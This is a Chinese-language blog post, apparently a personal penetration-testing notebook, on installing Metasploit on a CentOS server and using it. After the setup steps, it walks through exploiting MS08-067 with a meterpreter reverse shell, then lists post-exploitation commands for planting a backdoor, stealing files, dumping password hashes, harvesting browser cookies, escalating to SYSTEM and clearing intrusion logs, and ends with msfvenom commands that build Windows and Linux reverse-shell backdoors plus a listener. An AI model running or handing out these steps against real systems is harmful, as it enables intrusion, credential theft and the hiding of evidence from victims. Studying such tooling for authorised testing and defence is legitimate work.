

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/blog.jpg">
  <link rel="icon" href="/img/blog.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
    <meta name="description" content="msf搭建及使用搭建服务器 ：centos7 直接搭在公网方便，否则每次需要把msf穿透出来,下载命令 12curl https:&#x2F;&#x2F;raw.githubusercontent.com&#x2F;rapid7&#x2F;metasploit-omnibus&#x2F;master&#x2F;config&#x2F;templates&#x2F;metasploit-framework-wrappers&#x2F;msfupdate.erb &gt; msfinsta">
<meta property="og:type" content="article">
<meta property="og:title" content="msf搭建及使用">
<meta property="og:url" content="http://example.com/2023/06/05/msf%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/index.html">
<meta property="og:site_name" content="TTblog">
<meta property="og:description" content="msf搭建及使用搭建服务器 ：centos7 直接搭在公网方便，否则每次需要把msf穿透出来,下载命令 12curl https:&#x2F;&#x2F;raw.githubusercontent.com&#x2F;rapid7&#x2F;metasploit-omnibus&#x2F;master&#x2F;config&#x2F;templates&#x2F;metasploit-framework-wrappers&#x2F;msfupdate.erb &gt; msfinsta">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://raw.githubusercontent.com/shenmaa/tupian/main/img/202306061642797.png">
<meta property="og:image" content="https://raw.githubusercontent.com/shenmaa/tupian/main/img/202306061647550.png">
<meta property="article:published_time" content="2023-06-05T03:22:34.000Z">
<meta property="article:modified_time" content="2023-06-07T01:47:37.442Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="渗透测试">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://raw.githubusercontent.com/shenmaa/tupian/main/img/202306061642797.png">
  
  
  
  <title>msf搭建及使用 - TTblog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  

  

  



  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>不会做题的菜鸡</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>主页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>文章</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>类别</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/bg.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="msf搭建及使用"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-06-05 11:22" pubdate>
          June 5, 2023 am
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3.5k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          30 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">msf搭建及使用</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="msf搭建及使用"><a href="#msf搭建及使用" class="headerlink" title="msf搭建及使用"></a>msf搭建及使用</h1><h2 id="搭建"><a href="#搭建" class="headerlink" title="搭建"></a>搭建</h2><p>服务器 ：centos7</p>
<p>直接搭在公网方便，否则每次需要把msf穿透出来,下载命令</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs awk">curl https:<span class="hljs-regexp">//</span>raw.githubusercontent.com<span class="hljs-regexp">/rapid7/m</span>etasploit-omnibus<span class="hljs-regexp">/master/</span>config<span class="hljs-regexp">/templates/m</span>etasploit-framework-wrappers<span class="hljs-regexp">/msfupdate.erb &gt; msfinstall &amp;&amp; chmod 755 msfinstall &amp;&amp; ./m</span>sfinstall<br><br></code></pre></td></tr></table></figure>

<p>输入msfconlse<br> 判断是否安装成功，出现类似这种图案就是安装成功了</p>
<p><img src="https://raw.githubusercontent.com/shenmaa/tupian/main/img/202306061642797.png" srcset="/img/loading.gif" lazyload alt="image-20230606164051554"></p>
<p>postgresql数据库</p>
<p>postgresql数据库是第一个坑，postgresql数据库连不上，不用管，直接卸载</p>
<figure class="highlight cmake"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs cmake">yum <span class="hljs-keyword">remove</span> postgresql      <span class="hljs-comment">#卸载</span><br>rpm -qa | grep postgresql  <span class="hljs-comment">#查看是否卸载完成</span><br></code></pre></td></tr></table></figure>

<p>建议直接用我下面的命令，网上教程很多命令和我不一样，但是请相信，我这个是最简单，最不会出现问题的命令</p>
<p>安装rpm文件</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs awk">yum install https:<span class="hljs-regexp">//</span>download.postgresql.org<span class="hljs-regexp">/pub/</span>repos<span class="hljs-regexp">/yum/</span>reporpms<span class="hljs-regexp">/EL-7-x86_64/</span>pgdg-redhat-repo-latest.noarch.rpm<br><br></code></pre></td></tr></table></figure>

<p>安装客户端和服务端</p>
<figure class="highlight cmake"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs cmake">yum <span class="hljs-keyword">install</span> postgresql<br>yum <span class="hljs-keyword">install</span> postgresql-server<br><br></code></pre></td></tr></table></figure>

<p>初始化数据库</p>
<figure class="highlight arduino"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs arduino">postgresql-setup initdb<br></code></pre></td></tr></table></figure>

<p>设置自动启动并且启动postgresql服务</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">systemctl <span class="hljs-built_in">enable</span> postgresql<br>systemctl start postgresql<br></code></pre></td></tr></table></figure>



<p>到了这个步骤，那恭喜你，马上就要完成了，这还有最后一个坑<br> 那就是不能以root用户进行初始化</p>
<p>首先先进入msf的目录下</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">cd</span> /opt/metasploit-framework/bin/<br></code></pre></td></tr></table></figure>

<p>接下来执行下面的命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">useradd msf     <span class="hljs-comment">#创建一个用户msf</span><br>su msf         <span class="hljs-comment">#使用msf用户</span><br>./msfdb init <span class="hljs-comment">#初始化数据库</span><br></code></pre></td></tr></table></figure>

<p>创建完成后在msf用户目录会生成一个.msf目录里面会有一个database.yml文件<br> 然后，我们这时从msf账户切换到root用户：</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs awk">cp <span class="hljs-regexp">/home/m</span>sf<span class="hljs-regexp">/.msf4/</span>database.yml <span class="hljs-regexp">/opt/m</span>etasploit-framework<span class="hljs-regexp">/embedded/</span>framework<span class="hljs-regexp">/config/</span><br><br></code></pre></td></tr></table></figure>

<p>到这就结束了，最后再次启动msf，查看数据库的连接状态</p>
<p><img src="https://raw.githubusercontent.com/shenmaa/tupian/main/img/202306061647550.png" srcset="/img/loading.gif" lazyload alt="image-20230606164758497"></p>
<h2 id="使用"><a href="#使用" class="headerlink" title="使用"></a>使用</h2><p>启动获取shell</p>
<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs gams"><span class="hljs-number">1.</span> 启动 msfconsole<br><span class="hljs-number">2.</span> 搜索某个模块 search ms08<span class="hljs-number">-067</span><br><span class="hljs-number">3.</span> 使用某个模块 use exploit/windows/smb/ms08<span class="hljs-number">-067</span>_netapi<br><span class="hljs-number">4.</span> 查看当前模块可以使用的payload[可以省略] show payloads<br><span class="hljs-number">5.</span> 查看当前模块需要的参数配置 show <span class="hljs-keyword">options</span>[可略]<br><span class="hljs-number">6.</span> 选择反弹shell的模块 <span class="hljs-keyword">set</span> payload <span class="hljs-comment">windows</span>/meterpreter/<span class="hljs-comment">reverse_tcp</span><br>7. 设置目标的IP地址 <span class="hljs-keyword">set</span> <span class="hljs-comment">RHOST 192.168.10.1</span><br>8. 设置本地的IP地址 <span class="hljs-keyword">set</span> <span class="hljs-comment">LHOST 192.168.1.1</span><br>9 .设置本地的监听端口 <span class="hljs-keyword">set</span> <span class="hljs-comment">LPORT 8888</span><br>10. show <span class="hljs-comment">targets</span> 查看<span class="hljs-comment">metasploit</span>的渗透攻击模块通常可以列出受到漏洞影响的目标系统类型。<br>如某些漏洞只适用特定系统的某些版本，这时可以根据目标的操作类型版本来设置版本 <span class="hljs-keyword">set</span> <span class="hljs-comment">target 1</span><br>进行攻击 run/exploit，这样就返回一个meterpreter<br><br></code></pre></td></tr></table></figure>



<h2 id="常用命令"><a href="#常用命令" class="headerlink" title="常用命令"></a>常用命令</h2><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><code class="hljs awk"><span class="hljs-number">1</span>、background:把meterpreter后台挂起<br><span class="hljs-number">2</span>、sessions:查看已经成功获取的会话<br>   sessions -i +num :连接到指定序列号的meterpreter会话继续利用<br>   sessions -i  <span class="hljs-number">2</span>:连接第三个会话主机<br><span class="hljs-number">3</span>、shell：获取目标主机的远程命令行shell，使用<span class="hljs-keyword">exit</span>退出当前的shell<br><span class="hljs-number">4</span>、cat:查看目标主机上的文档内容<br>      cat c:/test.txt<br><span class="hljs-number">5</span>、getwd:获取系统工作的当前目录<br><span class="hljs-number">6</span>、upload:上传文件到目标主机<br>     upload  setup.exe  c:\\windows\\system32\  把后门程序setup.exe上传到目标主机的system32目录下<br><span class="hljs-number">7</span>、download:把目标主机上的文件下载到我们的攻击主机上<br>     download  C:\\boot.<span class="hljs-keyword">in</span>  <span class="hljs-regexp">/root/</span>  把目标主机c盘根目录下的boot.ini文件下载到攻击主机的<span class="hljs-regexp">/root/</span>目录下<br><span class="hljs-number">8</span>、edit：调用vi编辑器，对目标主机的文件进行修改<br>     edit C:<span class="hljs-regexp">/Windows/</span>System32<span class="hljs-regexp">/drivers/</span>etc/hosts   修改目标主机的hosts文件<br><span class="hljs-number">9</span>、search: 再目标主机上搜索文件<br>          search   -d   c:\\  -f *.doc      在目标主机的C盘下搜索doc文档<br><span class="hljs-number">10</span>、ipconfig/ifconfig:查看目标主机上的网络参数<br><span class="hljs-number">11</span>、portfwd:端口转发，把目标主机的<span class="hljs-number">3389</span>端口转发到其他端口<br>       portfwd add -l <span class="hljs-number">1122</span> -p <span class="hljs-number">3389</span> -r <span class="hljs-number">192.168</span>.<span class="hljs-number">10.1</span><br>       把目标主机的<span class="hljs-number">3389</span>端口转发到<span class="hljs-number">192.168</span>.<span class="hljs-number">10.1</span>的<span class="hljs-number">1122</span>端口，访问<span class="hljs-number">192.168</span>.<span class="hljs-number">10.1</span>：<span class="hljs-number">1122</span>就能打开目标主机的远程桌面<br><span class="hljs-number">12</span>、route:显示目标主机上的主机路由表<br><span class="hljs-number">13</span>、getuid:显示目标主机上的主机路由表<br><span class="hljs-number">14</span>、sysinfo:查看目标主机的系统信息<br><span class="hljs-number">15</span>、getpid:获取meterpreter会话在 目标主机上的注入进程的进程号<br><span class="hljs-number">16</span>、migrate:将meterpreter会话进程移植到另外一个进程<br>    如果我们反弹的meterpreter会话是对方打开了一个预设代码的word文档产生的，如果对方一旦关闭该word文档，我们获取的meterpreter会话就 <br>    会关闭，所以我们需要把会话进程注入到explorer.exe(桌面进程<br>    先用ps 查看explorer.exe进程的pid为 xxx,<br>    然后执行  migrate xxx<br><span class="hljs-number">17</span>、execute:在目标主机上运行某个程序<br>           execute -f -i -H cmd.exe  以隐藏的方式运行cmd.exe<br><span class="hljs-number">18</span>、shutdown:关闭目标主机<br><span class="hljs-number">19</span>、getsystem:使用该命令提升当前进程的执行账户为system用户， 拿到系统的最高权限<br><span class="hljs-number">20</span>、hashdump:在获得system权限的情况下，使用hashdump命令可以得到目标的SAM文件，获取目标主机账号密码的hash信息<br><span class="hljs-number">21</span>、run  post<span class="hljs-regexp">/windows/g</span>ather/checkvm<br>       在meterpreter下run post<span class="hljs-regexp">/windows/g</span>ather/checkvm 检测是否为一台虚拟机<br><span class="hljs-number">22</span>、run post<span class="hljs-regexp">/windows/g</span>ather/enum_applications<br>       在meterpreter下run post<span class="hljs-regexp">/windows/g</span>ather/enum_applications  获取目标主机上的软件安装信息<br><span class="hljs-number">23</span>、run post<span class="hljs-regexp">/windows/g</span>ather/dumplinks<br>       在meterpreter下run post<span class="hljs-regexp">/windows/g</span>ather/dumplinks  获取目标主机最近访问过的文档、链接等信息<br><span class="hljs-number">24</span>、run post<span class="hljs-regexp">/windows/g</span>ather/enum_ie <br>       在meterpreter下run post<span class="hljs-regexp">/windows/g</span>ather/enum_ie<br>       获取到的目标主机上的ie浏览器缓存历史记录和cookies信息等都保存到了攻击主机本地的<span class="hljs-regexp">/root/</span>.msf5<span class="hljs-regexp">/loot/</span>目录下<br><span class="hljs-number">25</span>、clearev命令:入侵痕迹清除<br><br></code></pre></td></tr></table></figure>

<h2 id="生成后门"><a href="#生成后门" class="headerlink" title="生成后门"></a>生成后门</h2><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs routeros">1、生成windows后门：<br>       msfvenom -p windows/meterpreter/reverse_tcp <span class="hljs-attribute">LHOST</span>=攻击机IP <span class="hljs-attribute">LPORT</span>=攻击端口  -f exe -o /tmp/hack.exe<br>2、生成linux后门<br>       msfvenom -p linux/x86/meterpreter/reverse_tcp <span class="hljs-attribute">LHOST</span>=攻击ip <span class="hljs-attribute">LPORT</span>=攻击端口  -f elf &gt; shell.elf<br> <br>use  exploit/multi/handler<br><span class="hljs-built_in">set</span> payload windows/meterpreter/reverse_tcp<br><span class="hljs-built_in">set</span> LHOST 192.168.1.53<br><span class="hljs-built_in">set</span> LPORT 4444<br>exploit<br><br></code></pre></td></tr></table></figure>


                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E5%B7%A5%E5%85%B7/" class="category-chain-item">工具</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">#渗透测试</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>msf搭建及使用</div>
      <div>http://example.com/2023/06/05/msf搭建及使用/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>John Doe</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>June 5, 2023</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/06/02/DC-9%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/" title="DC-9靶机渗透">
                        <span class="hidden-mobile">DC-9靶机渗透</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="http://140.210.217.83/" target="_blank" rel="nofollow noopener"><span>推荐</span></a> <i class="iconfont icon-love"></i> <a href="http://140.210.217.83/" target="_blank" rel="nofollow noopener"><span>博客</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
